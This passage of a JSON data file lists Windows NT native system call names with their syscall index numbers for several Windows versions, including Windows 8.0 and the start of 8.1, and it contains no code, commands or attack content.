"NtQueryValueKey": 22, "NtAllocateVirtualMemory": 23, "NtQueryInformationProcess": 24, "NtWaitForMultipleObjects32": 25, "NtWriteFileGather": 26, "NtSetInformationProcess": 27, "NtCreateKey": 28, "NtFreeVirtualMemory": 29, "NtImpersonateClientOfPort": 30, "NtReleaseMutant": 31, "NtQueryInformationToken": 32, "NtRequestWaitReplyPort": 33, "NtQueryVirtualMemory": 34, "NtOpenThreadToken": 35, "NtQueryInformationThread": 36, "NtOpenProcess": 37, "NtSetInformationFile": 38, "NtMapViewOfSection": 39, "NtAccessCheckAndAuditAlarm": 40, "NtUnmapViewOfSection": 41, "NtReplyWaitReceivePortEx": 42, "NtTerminateProcess": 43, "NtSetEventBoostPriority": 44, "NtReadFileScatter": 45, "NtOpenThreadTokenEx": 46, "NtOpenProcessTokenEx": 47, "NtQueryPerformanceCounter": 48, "NtEnumerateKey": 49, "NtOpenFile": 50, "NtDelayExecution": 51, "NtQueryDirectoryFile": 52, "NtQuerySystemInformation": 53, "NtOpenSection": 54, "NtQueryTimer": 55, "NtFsControlFile": 56, "NtWriteVirtualMemory": 57, "NtCloseObjectAuditAlarm": 58, "NtDuplicateObject": 59, "NtQueryAttributesFile": 60, "NtClearEvent": 61, "NtReadVirtualMemory": 62, "NtOpenEvent": 63, "NtAdjustPrivilegesToken": 64, "NtDuplicateToken": 65, "NtContinue": 66, "NtQueryDefaultUILanguage": 67, "NtQueueApcThread": 68, "NtYieldExecution": 69, "NtAddAtom": 70, "NtCreateEvent": 71, "NtQueryVolumeInformationFile": 72, "NtCreateSection": 73, "NtFlushBuffersFile": 74, "NtApphelpCacheControl": 75, "NtCreateProcessEx": 76, "NtCreateThread": 77, "NtIsProcessInJob": 78, "NtProtectVirtualMemory": 79, "NtQuerySection": 80, "NtResumeThread": 81, "NtTerminateThread": 82, "NtReadRequestData": 83, "NtCreateFile": 84, "NtQueryEvent": 85, "NtWriteRequestData": 86, "NtOpenDirectoryObject": 87, "NtAccessCheckByTypeAndAuditAlarm": 88, "NtQuerySystemTime": 89, "NtWaitForMultipleObjects": 90, "NtSetInformationObject": 91, "NtCancelIoFile": 92, "NtTraceEvent": 93, "NtPowerInformation": 94, "NtSetValueKey": 95, "NtCancelTimer": 96, "NtSetTimer": 97, "NtAccessCheck": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 103, "NtAddBootEntry": 104, "NtAddDriverEntry": 105, "NtAdjustGroupsToken": 106, "NtAdjustTokenClaimsAndDeviceGroups": 107, "NtAlertResumeThread": 108, "NtAlertThread": 109, "NtAlertThreadByThreadId": 110, "NtAllocateLocallyUniqueId": 111, "NtAllocateReserveObject": 112, "NtAllocateUserPhysicalPages": 113, "NtAllocateUuids": 114, "NtAlpcAcceptConnectPort": 115, "NtAlpcCancelMessage": 116, "NtAlpcConnectPort": 117, "NtAlpcConnectPortEx": 118, "NtAlpcCreatePort": 119, "NtAlpcCreatePortSection": 120, "NtAlpcCreateResourceReserve": 121, "NtAlpcCreateSectionView": 122, "NtAlpcCreateSecurityContext": 123, "NtAlpcDeletePortSection": 124, "NtAlpcDeleteResourceReserve": 125, "NtAlpcDeleteSectionView": 126, "NtAlpcDeleteSecurityContext": 127, "NtAlpcDisconnectPort": 128, "NtAlpcImpersonateClientOfPort": 129, "NtAlpcOpenSenderProcess": 130, "NtAlpcOpenSenderThread": 131, "NtAlpcQueryInformation": 132, "NtAlpcQueryInformationMessage": 133, "NtAlpcRevokeSecurityContext": 134, "NtAlpcSendWaitReceivePort": 135, "NtAlpcSetInformation": 136, "NtAreMappedFilesTheSame": 137, "NtAssignProcessToJobObject": 138, "NtAssociateWaitCompletionPacket": 139, "NtCancelIoFileEx": 140, "NtCancelSynchronousIoFile": 141, "NtCancelTimer2": 142, "NtCancelWaitCompletionPacket": 143, "NtCommitComplete": 144, "NtCommitEnlistment": 145, "NtCommitTransaction": 146, "NtCompactKeys": 147, "NtCompareTokens": 148, "NtCompleteConnectPort": 149, "NtCompressKey": 150, "NtConnectPort": 151, "NtCreateDebugObject": 152, "NtCreateDirectoryObject": 153, "NtCreateDirectoryObjectEx": 154, "NtCreateEnlistment": 155, "NtCreateEventPair": 156, "NtCreateIRTimer": 157, "NtCreateIoCompletion": 158, "NtCreateJobObject": 159, "NtCreateJobSet": 160, "NtCreateKeyTransacted": 161, "NtCreateKeyedEvent": 162, "NtCreateLowBoxToken": 163, "NtCreateMailslotFile": 164, "NtCreateMutant": 165, "NtCreateNamedPipeFile": 166, "NtCreatePagingFile": 167, "NtCreatePort": 168, "NtCreatePrivateNamespace": 169, "NtCreateProcess": 170, "NtCreateProfile": 171, "NtCreateProfileEx": 172, "NtCreateResourceManager": 173, "NtCreateSemaphore": 174, "NtCreateSymbolicLinkObject": 175, "NtCreateThreadEx": 176, "NtCreateTimer": 177, "NtCreateTimer2": 178, "NtCreateToken": 179, "NtCreateTokenEx": 180, "NtCreateTransaction": 181, "NtCreateTransactionManager": 182, "NtCreateUserProcess": 183, "NtCreateWaitCompletionPacket": 184, "NtCreateWaitablePort": 185, "NtCreateWnfStateName": 186, "NtCreateWorkerFactory": 187, "NtDebugActiveProcess": 188, "NtDebugContinue": 189, "NtDeleteAtom": 190, "NtDeleteBootEntry": 191, "NtDeleteDriverEntry": 192, "NtDeleteFile": 193, "NtDeleteKey": 194, "NtDeleteObjectAuditAlarm": 195, "NtDeletePrivateNamespace": 196, "NtDeleteValueKey": 197, "NtDeleteWnfStateData": 198, "NtDeleteWnfStateName": 199, "NtDisableLastKnownGood": 200, "NtDisplayString": 201, "NtDrawText": 202, "NtEnableLastKnownGood": 203, "NtEnumerateBootEntries": 204, "NtEnumerateDriverEntries": 205, "NtEnumerateSystemEnvironmentValuesEx": 206, "NtEnumerateTransactionObject": 207, "NtExtendSection": 208, "NtFilterBootOption": 209, "NtFilterToken": 210, "NtFilterTokenEx": 211, "NtFlushBuffersFileEx": 212, "NtFlushInstallUILanguage": 213, "NtFlushInstructionCache": 214, "NtFlushKey": 215, "NtFlushProcessWriteBuffers": 216, "NtFlushVirtualMemory": 217, "NtFlushWriteBuffer": 218, "NtFreeUserPhysicalPages": 219, "NtFreezeRegistry": 220, "NtFreezeTransactions": 221, "NtGetCachedSigningLevel": 222, "NtGetCompleteWnfStateSubscription": 223, "NtGetContextThread": 224, "NtGetCurrentProcessorNumber": 225, "NtGetDevicePowerState": 226, "NtGetMUIRegistryInfo": 227, "NtGetNextProcess": 228, "NtGetNextThread": 229, "NtGetNlsSectionPtr": 230, "NtGetNotificationResourceManager": 231, "NtGetWriteWatch": 232, "NtImpersonateAnonymousToken": 233, "NtImpersonateThread": 234, "NtInitializeNlsFiles": 235, "NtInitializeRegistry": 236, "NtInitiatePowerAction": 237, "NtIsSystemResumeAutomatic": 238, "NtIsUILanguageComitted": 239, "NtListenPort": 240, "NtLoadDriver": 241, "NtLoadKey": 242, "NtLoadKey2": 243, "NtLoadKeyEx": 244, "NtLockFile": 245, "NtLockProductActivationKeys": 246, "NtLockRegistryKey": 247, "NtLockVirtualMemory": 248, "NtMakePermanentObject": 249, "NtMakeTemporaryObject": 250, "NtMapCMFModule": 251, "NtMapUserPhysicalPages": 252, "NtModifyBootEntry": 253, "NtModifyDriverEntry": 254, "NtNotifyChangeDirectoryFile": 255, "NtNotifyChangeKey": 256, "NtNotifyChangeMultipleKeys": 257, "NtNotifyChangeSession": 258, "NtOpenEnlistment": 259, "NtOpenEventPair": 260, "NtOpenIoCompletion": 261, "NtOpenJobObject": 262, "NtOpenKeyEx": 263, "NtOpenKeyTransacted": 264, "NtOpenKeyTransactedEx": 265, "NtOpenKeyedEvent": 266, "NtOpenMutant": 267, "NtOpenObjectAuditAlarm": 268, "NtOpenPrivateNamespace": 269, "NtOpenProcessToken": 270, "NtOpenResourceManager": 271, "NtOpenSemaphore": 272, "NtOpenSession": 273, "NtOpenSymbolicLinkObject": 274, "NtOpenThread": 275, "NtOpenTimer": 276, "NtOpenTransaction": 277, "NtOpenTransactionManager": 278, "NtPlugPlayControl": 279, "NtPrePrepareComplete": 280, "NtPrePrepareEnlistment": 281, "NtPrepareComplete": 282, "NtPrepareEnlistment": 283, "NtPrivilegeCheck": 284, "NtPrivilegeObjectAuditAlarm": 285, "NtPrivilegedServiceAuditAlarm": 286, "NtPropagationComplete": 287, "NtPropagationFailed": 288, "NtPulseEvent": 289, "NtQueryBootEntryOrder": 290, "NtQueryBootOptions": 291, "NtQueryDebugFilterState": 292, "NtQueryDirectoryObject": 293, "NtQueryDriverEntryOrder": 294, "NtQueryEaFile": 295, "NtQueryFullAttributesFile": 296, "NtQueryInformationAtom": 297, "NtQueryInformationEnlistment": 298, "NtQueryInformationJobObject": 299, "NtQueryInformationPort": 300, "NtQueryInformationResourceManager": 301, "NtQueryInformationTransaction": 302, "NtQueryInformationTransactionManager": 303, "NtQueryInformationWorkerFactory": 304, "NtQueryInstallUILanguage": 305, "NtQueryIntervalProfile": 306, "NtQueryIoCompletion": 307, "NtQueryLicenseValue": 308, "NtQueryMultipleValueKey": 309, "NtQueryMutant": 310, "NtQueryOpenSubKeys": 311, "NtQueryOpenSubKeysEx": 312, "NtQueryPortInformationProcess": 313, "NtQueryQuotaInformationFile": 314, "NtQuerySecurityAttributesToken": 315, "NtQuerySecurityObject": 316, "NtQuerySemaphore": 317, "NtQuerySymbolicLinkObject": 318, "NtQuerySystemEnvironmentValue": 319, "NtQuerySystemEnvironmentValueEx": 320, "NtQuerySystemInformationEx": 321, "NtQueryTimerResolution": 322, "NtQueryWnfStateData": 323, "NtQueryWnfStateNameInformation": 324, "NtQueueApcThreadEx": 325, "NtRaiseException": 326, "NtRaiseHardError": 327, "NtReadOnlyEnlistment": 328, "NtRecoverEnlistment": 329, "NtRecoverResourceManager": 330, "NtRecoverTransactionManager": 331, "NtRegisterProtocolAddressInformation": 332, "NtRegisterThreadTerminatePort": 333, "NtReleaseKeyedEvent": 334, "NtReleaseWorkerFactoryWorker": 335, "NtRemoveIoCompletionEx": 336, "NtRemoveProcessDebug": 337, "NtRenameKey": 338, "NtRenameTransactionManager": 339, "NtReplaceKey": 340, "NtReplacePartitionUnit": 341, "NtReplyWaitReplyPort": 342, "NtRequestPort": 343, "NtResetEvent": 344, "NtResetWriteWatch": 345, "NtRestoreKey": 346, "NtResumeProcess": 347, "NtRollbackComplete": 348, "NtRollbackEnlistment": 349, "NtRollbackTransaction": 350, "NtRollforwardTransactionManager": 351, "NtSaveKey": 352, "NtSaveKeyEx": 353, "NtSaveMergedKeys": 354, "NtSecureConnectPort": 355, "NtSerializeBoot": 356, "NtSetBootEntryOrder": 357, "NtSetBootOptions": 358, "NtSetCachedSigningLevel": 359, "NtSetContextThread": 360, "NtSetDebugFilterState": 361, "NtSetDefaultHardErrorPort": 362, "NtSetDefaultLocale": 363, "NtSetDefaultUILanguage": 364, "NtSetDriverEntryOrder": 365, "NtSetEaFile": 366, "NtSetHighEventPair": 367, "NtSetHighWaitLowEventPair": 368, "NtSetIRTimer": 369, "NtSetInformationDebugObject": 370, "NtSetInformationEnlistment": 371, "NtSetInformationJobObject": 372, "NtSetInformationKey": 373, "NtSetInformationResourceManager": 374, "NtSetInformationToken": 375, "NtSetInformationTransaction": 376, "NtSetInformationTransactionManager": 377, "NtSetInformationVirtualMemory": 378, "NtSetInformationWorkerFactory": 379, "NtSetIntervalProfile": 380, "NtSetIoCompletion": 381, "NtSetIoCompletionEx": 382, "NtSetLdtEntries": 383, "NtSetLowEventPair": 384, "NtSetLowWaitHighEventPair": 385, "NtSetQuotaInformationFile": 386, "NtSetSecurityObject": 387, "NtSetSystemEnvironmentValue": 388, "NtSetSystemEnvironmentValueEx": 389, "NtSetSystemInformation": 390, "NtSetSystemPowerState": 391, "NtSetSystemTime": 392, "NtSetThreadExecutionState": 393, "NtSetTimer2": 394, "NtSetTimerEx": 395, "NtSetTimerResolution": 396, "NtSetUuidSeed": 397, "NtSetVolumeInformationFile": 398, "NtSetWnfProcessNotificationEvent": 399, "NtShutdownSystem": 400, "NtShutdownWorkerFactory": 401, "NtSignalAndWaitForSingleObject": 402, "NtSinglePhaseReject": 403, "NtStartProfile": 404, "NtStopProfile": 405, "NtSubscribeWnfStateChange": 406, "NtSuspendProcess": 407, "NtSuspendThread": 408, "NtSystemDebugControl": 409, "NtTerminateJobObject": 410, "NtTestAlert": 411, "NtThawRegistry": 412, "NtThawTransactions": 413, "NtTraceControl": 414, "NtTranslateFilePath": 415, "NtUmsThreadYield": 416, "NtUnloadDriver": 417, "NtUnloadKey": 418, "NtUnloadKey2": 419, "NtUnloadKeyEx": 420, "NtUnlockFile": 421, "NtUnlockVirtualMemory": 422, "NtUnmapViewOfSectionEx": 423, "NtUnsubscribeWnfStateChange": 424, "NtUpdateWnfStateData": 425, "NtVdmControl": 426, "NtWaitForAlertByThreadId": 427, "NtWaitForDebugEvent": 428, "NtWaitForKeyedEvent": 429, "NtWaitForWorkViaWorkerFactory": 430, "NtWaitHighEventPair": 431, "NtWaitLowEventPair": 432}}, "Windows 8": {"8.0": {"NtWorkerFactoryWorkerReady": 0, "NtMapUserPhysicalPagesScatter": 1, "NtWaitForSingleObject": 2, "NtCallbackReturn": 3, "NtReadFile": 4, "NtDeviceIoControlFile": 5, "NtWriteFile": 6, "NtRemoveIoCompletion": 7, "NtReleaseSemaphore": 8, "NtReplyWaitReceivePort": 9, "NtReplyPort": 10, "NtSetInformationThread": 11, "NtSetEvent": 12, "NtClose": 13, "NtQueryObject": 14, "NtQueryInformationFile": 15, "NtOpenKey": 16, "NtEnumerateValueKey": 17, "NtFindAtom": 18, "NtQueryDefaultLocale": 19, "NtQueryKey": 20, "NtQueryValueKey": 21, "NtAllocateVirtualMemory": 22, "NtQueryInformationProcess": 23, "NtWaitForMultipleObjects32": 24, "NtWriteFileGather": 25, "NtSetInformationProcess": 26, "NtCreateKey": 27, "NtFreeVirtualMemory": 28, "NtImpersonateClientOfPort": 29, "NtReleaseMutant": 30, "NtQueryInformationToken": 31, "NtRequestWaitReplyPort": 32, "NtQueryVirtualMemory": 33, "NtOpenThreadToken": 34, "NtQueryInformationThread": 35, "NtOpenProcess": 36, "NtSetInformationFile": 37, "NtMapViewOfSection": 38, "NtAccessCheckAndAuditAlarm": 39, "NtUnmapViewOfSection": 40, "NtReplyWaitReceivePortEx": 41, "NtTerminateProcess": 42, "NtSetEventBoostPriority": 43, "NtReadFileScatter": 44, "NtOpenThreadTokenEx": 45, "NtOpenProcessTokenEx": 46, "NtQueryPerformanceCounter": 47, "NtEnumerateKey": 48, "NtOpenFile": 49, "NtDelayExecution": 50, "NtQueryDirectoryFile": 51, "NtQuerySystemInformation": 52, "NtOpenSection": 53, "NtQueryTimer": 54, "NtFsControlFile": 55, "NtWriteVirtualMemory": 56, "NtCloseObjectAuditAlarm": 57, "NtDuplicateObject": 58, "NtQueryAttributesFile": 59, "NtClearEvent": 60, "NtReadVirtualMemory": 61, "NtOpenEvent": 62, "NtAdjustPrivilegesToken": 63, "NtDuplicateToken": 64, "NtContinue": 65, "NtQueryDefaultUILanguage": 66, "NtQueueApcThread": 67, "NtYieldExecution": 68, "NtAddAtom": 69, "NtCreateEvent": 70, "NtQueryVolumeInformationFile": 71, "NtCreateSection": 72, "NtFlushBuffersFile": 73, "NtApphelpCacheControl": 74, "NtCreateProcessEx": 75, "NtCreateThread": 76, "NtIsProcessInJob": 77, "NtProtectVirtualMemory": 78, "NtQuerySection": 79, "NtResumeThread": 80, "NtTerminateThread": 81, "NtReadRequestData": 82, "NtCreateFile": 83, "NtQueryEvent": 84, "NtWriteRequestData": 85, "NtOpenDirectoryObject": 86, "NtAccessCheckByTypeAndAuditAlarm": 87, "NtQuerySystemTime": 88, "NtWaitForMultipleObjects": 89, "NtSetInformationObject": 90, "NtCancelIoFile": 91, "NtTraceEvent": 92, "NtPowerInformation": 93, "NtSetValueKey": 94, "NtCancelTimer": 95, "NtSetTimer": 96, "NtAcceptConnectPort": 97, "NtAccessCheck": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 103, "NtAddBootEntry": 104, "NtAddDriverEntry": 105, "NtAdjustGroupsToken": 106, "NtAdjustTokenClaimsAndDeviceGroups": 107, "NtAlertResumeThread": 108, "NtAlertThread": 109, "NtAlertThreadByThreadId": 110, "NtAllocateLocallyUniqueId": 111, "NtAllocateReserveObject": 112, "NtAllocateUserPhysicalPages": 113, "NtAllocateUuids": 114, "NtAlpcAcceptConnectPort": 115, "NtAlpcCancelMessage": 116, "NtAlpcConnectPort": 117, "NtAlpcConnectPortEx": 118, "NtAlpcCreatePort": 119, "NtAlpcCreatePortSection": 120, "NtAlpcCreateResourceReserve": 121, "NtAlpcCreateSectionView": 122, "NtAlpcCreateSecurityContext": 123, "NtAlpcDeletePortSection": 124, "NtAlpcDeleteResourceReserve": 125, "NtAlpcDeleteSectionView": 126, "NtAlpcDeleteSecurityContext": 127, "NtAlpcDisconnectPort": 128, "NtAlpcImpersonateClientOfPort": 129, "NtAlpcOpenSenderProcess": 130, "NtAlpcOpenSenderThread": 131, "NtAlpcQueryInformation": 132, "NtAlpcQueryInformationMessage": 133, "NtAlpcRevokeSecurityContext": 134, "NtAlpcSendWaitReceivePort": 135, "NtAlpcSetInformation": 136, "NtAreMappedFilesTheSame": 137, "NtAssignProcessToJobObject": 138, "NtAssociateWaitCompletionPacket": 139, "NtCancelIoFileEx": 140, "NtCancelSynchronousIoFile": 141, "NtCancelWaitCompletionPacket": 142, "NtCommitComplete": 143, "NtCommitEnlistment": 144, "NtCommitTransaction": 145, "NtCompactKeys": 146, "NtCompareTokens": 147, "NtCompleteConnectPort": 148, "NtCompressKey": 149, "NtConnectPort": 150, "NtCreateDebugObject": 151, "NtCreateDirectoryObject": 152, "NtCreateDirectoryObjectEx": 153, "NtCreateEnlistment": 154, "NtCreateEventPair": 155, "NtCreateIRTimer": 156, "NtCreateIoCompletion": 157, "NtCreateJobObject": 158, "NtCreateJobSet": 159, "NtCreateKeyTransacted": 160, "NtCreateKeyedEvent": 161, "NtCreateLowBoxToken": 162, "NtCreateMailslotFile": 163, "NtCreateMutant": 164, "NtCreateNamedPipeFile": 165, "NtCreatePagingFile": 166, "NtCreatePort": 167, "NtCreatePrivateNamespace": 168, "NtCreateProcess": 169, "NtCreateProfile": 170, "NtCreateProfileEx": 171, "NtCreateResourceManager": 172, "NtCreateSemaphore": 173, "NtCreateSymbolicLinkObject": 174, "NtCreateThreadEx": 175, "NtCreateTimer": 176, "NtCreateToken": 177, "NtCreateTokenEx": 178, "NtCreateTransaction": 179, "NtCreateTransactionManager": 180, "NtCreateUserProcess": 181, "NtCreateWaitCompletionPacket": 182, "NtCreateWaitablePort": 183, "NtCreateWnfStateName": 184, "NtCreateWorkerFactory": 185, "NtDebugActiveProcess": 186, "NtDebugContinue": 187, "NtDeleteAtom": 188, "NtDeleteBootEntry": 189, "NtDeleteDriverEntry": 190, "NtDeleteFile": 191, "NtDeleteKey": 192, "NtDeleteObjectAuditAlarm": 193, "NtDeletePrivateNamespace": 194, "NtDeleteValueKey": 195, "NtDeleteWnfStateData": 196, "NtDeleteWnfStateName": 197, "NtDisableLastKnownGood": 198, "NtDisplayString": 199, "NtDrawText": 200, "NtEnableLastKnownGood": 201, "NtEnumerateBootEntries": 202, "NtEnumerateDriverEntries": 203, "NtEnumerateSystemEnvironmentValuesEx": 204, "NtEnumerateTransactionObject": 205, "NtExtendSection": 206, "NtFilterBootOption": 207, "NtFilterToken": 208, "NtFilterTokenEx": 209, "NtFlushBuffersFileEx": 210, "NtFlushInstallUILanguage": 211, "NtFlushInstructionCache": 212, "NtFlushKey": 213, "NtFlushProcessWriteBuffers": 214, "NtFlushVirtualMemory": 215, "NtFlushWriteBuffer": 216, "NtFreeUserPhysicalPages": 217, "NtFreezeRegistry": 218, "NtFreezeTransactions": 219, "NtGetCachedSigningLevel": 220, "NtGetContextThread": 221, "NtGetCurrentProcessorNumber": 222, "NtGetDevicePowerState": 223, "NtGetMUIRegistryInfo": 224, "NtGetNextProcess": 225, "NtGetNextThread": 226, "NtGetNlsSectionPtr": 227, "NtGetNotificationResourceManager": 228, "NtGetWriteWatch": 229, "NtImpersonateAnonymousToken": 230, "NtImpersonateThread": 231, "NtInitializeNlsFiles": 232, "NtInitializeRegistry": 233, "NtInitiatePowerAction": 234, "NtIsSystemResumeAutomatic": 235, "NtIsUILanguageComitted": 236, "NtListenPort": 237, "NtLoadDriver": 238, "NtLoadKey": 239, "NtLoadKey2": 240, "NtLoadKeyEx": 241, "NtLockFile": 242, "NtLockProductActivationKeys": 243, "NtLockRegistryKey": 244, "NtLockVirtualMemory": 245, "NtMakePermanentObject": 246, "NtMakeTemporaryObject": 247, "NtMapCMFModule": 248, "NtMapUserPhysicalPages": 249, "NtModifyBootEntry": 250, "NtModifyDriverEntry": 251, "NtNotifyChangeDirectoryFile": 252, "NtNotifyChangeKey": 253, "NtNotifyChangeMultipleKeys": 254, "NtNotifyChangeSession": 255, "NtOpenEnlistment": 256, "NtOpenEventPair": 257, "NtOpenIoCompletion": 258, "NtOpenJobObject": 259, "NtOpenKeyEx": 260, "NtOpenKeyTransacted": 261, "NtOpenKeyTransactedEx": 262, "NtOpenKeyedEvent": 263, "NtOpenMutant": 264, "NtOpenObjectAuditAlarm": 265, "NtOpenPrivateNamespace": 266, "NtOpenProcessToken": 267, "NtOpenResourceManager": 268, "NtOpenSemaphore": 269, "NtOpenSession": 270, "NtOpenSymbolicLinkObject": 271, "NtOpenThread": 272, "NtOpenTimer": 273, "NtOpenTransaction": 274, "NtOpenTransactionManager": 275, "NtPlugPlayControl": 276, "NtPrePrepareComplete": 277, "NtPrePrepareEnlistment": 278, "NtPrepareComplete": 279, "NtPrepareEnlistment": 280, "NtPrivilegeCheck": 281, "NtPrivilegeObjectAuditAlarm": 282, "NtPrivilegedServiceAuditAlarm": 283, "NtPropagationComplete": 284, "NtPropagationFailed": 285, "NtPulseEvent": 286, "NtQueryBootEntryOrder": 287, "NtQueryBootOptions": 288, "NtQueryDebugFilterState": 289, "NtQueryDirectoryObject": 290, "NtQueryDriverEntryOrder": 291, "NtQueryEaFile": 292, "NtQueryFullAttributesFile": 293, "NtQueryInformationAtom": 294, "NtQueryInformationEnlistment": 295, "NtQueryInformationJobObject": 296, "NtQueryInformationPort": 297, "NtQueryInformationResourceManager": 298, "NtQueryInformationTransaction": 299, "NtQueryInformationTransactionManager": 300, "NtQueryInformationWorkerFactory": 301, "NtQueryInstallUILanguage": 302, "NtQueryIntervalProfile": 303, "NtQueryIoCompletion": 304, "NtQueryLicenseValue": 305, "NtQueryMultipleValueKey": 306, "NtQueryMutant": 307, "NtQueryOpenSubKeys": 308, "NtQueryOpenSubKeysEx": 309, "NtQueryPortInformationProcess": 310, "NtQueryQuotaInformationFile": 311, "NtQuerySecurityAttributesToken": 312, "NtQuerySecurityObject": 313, "NtQuerySemaphore": 314, "NtQuerySymbolicLinkObject": 315, "NtQuerySystemEnvironmentValue": 316, "NtQuerySystemEnvironmentValueEx": 317, "NtQuerySystemInformationEx": 318, "NtQueryTimerResolution": 319, "NtQueryWnfStateData": 320, "NtQueryWnfStateNameInformation": 321, "NtQueueApcThreadEx": 322, "NtRaiseException": 323, "NtRaiseHardError": 324, "NtReadOnlyEnlistment": 325, "NtRecoverEnlistment": 326, "NtRecoverResourceManager": 327, "NtRecoverTransactionManager": 328, "NtRegisterProtocolAddressInformation": 329, "NtRegisterThreadTerminatePort": 330, "NtReleaseKeyedEvent": 331, "NtReleaseWorkerFactoryWorker": 332, "NtRemoveIoCompletionEx": 333, "NtRemoveProcessDebug": 334, "NtRenameKey": 335, "NtRenameTransactionManager": 336, "NtReplaceKey": 337, "NtReplacePartitionUnit": 338, "NtReplyWaitReplyPort": 339, "NtRequestPort": 340, "NtResetEvent": 341, "NtResetWriteWatch": 342, "NtRestoreKey": 343, "NtResumeProcess": 344, "NtRollbackComplete": 345, "NtRollbackEnlistment": 346, "NtRollbackTransaction": 347, "NtRollforwardTransactionManager": 348, "NtSaveKey": 349, "NtSaveKeyEx": 350, "NtSaveMergedKeys": 351, "NtSecureConnectPort": 352, "NtSerializeBoot": 353, "NtSetBootEntryOrder": 354, "NtSetBootOptions": 355, "NtSetCachedSigningLevel": 356, "NtSetContextThread": 357, "NtSetDebugFilterState": 358, "NtSetDefaultHardErrorPort": 359, "NtSetDefaultLocale": 360, "NtSetDefaultUILanguage": 361, "NtSetDriverEntryOrder": 362, "NtSetEaFile": 363, "NtSetHighEventPair": 364, "NtSetHighWaitLowEventPair": 365, "NtSetIRTimer": 366, "NtSetInformationDebugObject": 367, "NtSetInformationEnlistment": 368, "NtSetInformationJobObject": 369, "NtSetInformationKey": 370, "NtSetInformationResourceManager": 371, "NtSetInformationToken": 372, "NtSetInformationTransaction": 373, "NtSetInformationTransactionManager": 374, "NtSetInformationVirtualMemory": 375, "NtSetInformationWorkerFactory": 376, "NtSetIntervalProfile": 377, "NtSetIoCompletion": 378, "NtSetIoCompletionEx": 379, "NtSetLdtEntries": 380, "NtSetLowEventPair": 381, "NtSetLowWaitHighEventPair": 382, "NtSetQuotaInformationFile": 383, "NtSetSecurityObject": 384, "NtSetSystemEnvironmentValue": 385, "NtSetSystemEnvironmentValueEx": 386, "NtSetSystemInformation": 387, "NtSetSystemPowerState": 388, "NtSetSystemTime": 389, "NtSetThreadExecutionState": 390, "NtSetTimerEx": 391, "NtSetTimerResolution": 392, "NtSetUuidSeed": 393, "NtSetVolumeInformationFile": 394, "NtShutdownSystem": 395, "NtShutdownWorkerFactory": 396, "NtSignalAndWaitForSingleObject": 397, "NtSinglePhaseReject": 398, "NtStartProfile": 399, "NtStopProfile": 400, "NtSubscribeWnfStateChange": 401, "NtSuspendProcess": 402, "NtSuspendThread": 403, "NtSystemDebugControl": 404, "NtTerminateJobObject": 405, "NtTestAlert": 406, "NtThawRegistry": 407, "NtThawTransactions": 408, "NtTraceControl": 409, "NtTranslateFilePath": 410, "NtUmsThreadYield": 411, "NtUnloadDriver": 412, "NtUnloadKey": 413, "NtUnloadKey2": 414, "NtUnloadKeyEx": 415, "NtUnlockFile": 416, "NtUnlockVirtualMemory": 417, "NtUnmapViewOfSectionEx": 418, "NtUnsubscribeWnfStateChange": 419, "NtUpdateWnfStateData": 420, "NtVdmControl": 421, "NtWaitForAlertByThreadId": 422, "NtWaitForDebugEvent": 423, "NtWaitForKeyedEvent": 424, "NtWaitForWnfNotifications": 425, "NtWaitForWorkViaWorkerFactory": 426, "NtWaitHighEventPair": 427, "NtWaitLowEventPair": 428}, "8.1": {"NtWorkerFactoryWorkerReady": 0, "NtAcceptConnectPort": 1, "NtMapUserPhysicalPagesScatter": 2, "NtWaitForSingleObject": 3, "NtCallbackReturn": 4, "NtReadFile": 5, "NtDeviceIoControlFile": 6, "NtWriteFile": 7, "NtRemoveIoCompletion": 8, "NtReleaseSemaphore": 9, "NtReplyWaitReceivePort": 10, "NtReplyPort": 11, "NtSetInformationThread": 12, "NtSetEvent": 13, "NtClose": 14, "NtQueryObject": 15, "NtQueryInformationFile": 16, "NtOpenKey": 17, "NtEnumerateValueKey": 18, "NtFindAtom": 19, "NtQueryDefaultLocale": 20, "NtQueryKey": 21, "NtQueryValueKey": 22, "NtAllocateVirtualMemory": 23, "NtQueryInformationProcess": 24, "NtWaitForMultipleObjects32": 25, "NtWriteFileGather": 26, "NtSetInformationProcess": 27, "NtCreateKey": 28, "NtFreeVirtualMemory": 29, "NtImpersonateClientOfPort": 30, "NtReleaseMutant": 31, "NtQueryInformationToken": 32, "NtRequestWaitReplyPort": 33, "NtQueryVirtualMemory": 34, "NtOpenThreadToken": 35, "NtQueryInformationThread": 36, "NtOpenProcess": 37, "NtSetInformationFile": 38, "NtMapViewOfSection": 39, "NtAccessCheckAndAuditAlarm": 40, "NtUnmapViewOfSection": 41, "NtReplyWaitReceivePortEx": 42, "NtTerminateProcess": 43, "NtSetEventBoostPriority": 44, "NtReadFileScatter": 45, "NtOpenThreadTokenEx": 46, "NtOpenProcessTokenEx": 47, "NtQueryPerformanceCounter": 48, "NtEnumerateKey": 49, "NtOpenFile": 50, "NtDelayExecution": 51, "NtQueryDirectoryFile": 52, "NtQuerySystemInformation": 53, "NtOpenSection": 54, "NtQueryTimer": 55, "NtFsControlFile": 56, "NtWriteVirtualMemory": 57, "NtCloseObjectAuditAlarm": 58, "NtDuplicateObject": 59, "NtQueryAttributesFile": 60, "NtClearEvent": 61, "NtReadVirtualMemory": 62, "NtOpenEvent": 63, "NtAdjustPrivilegesToken": 64, "NtDuplicateToken": 65, "NtContinue": 66, "NtQueryDefaultUILanguage": 67, "NtQueueApcThread": 68, "NtYieldExecution": 69, "NtAddAtom": 70, "NtCreateEvent": 71, "NtQueryVolumeInformationFile": 72, "NtCreateSection": 73, "NtFlushBuffersFile": 74, "NtApphelpCacheControl": 75, "NtCreateProcessEx": 76, "NtCreateThread": 77, "NtIsProcessInJob": 78, "NtProtectVirtualMemory": 79, "NtQuerySection": 80, "NtResumeThread": 81, "NtTerminateThread": 82, "NtReadRequestData": 83, "NtCreateFile": 84, "NtQueryEvent": 85, "NtWriteRequestData": 86, "NtOpenDirectoryObject": 87, "NtAccessCheckByTypeAndAuditAlarm": 88, "NtQuerySystemTime": 89, "NtWaitForMultipleObjects": 90, "NtSetInformationObject": 91, "NtCancelIoFile": 92, "NtTraceEvent": 93, 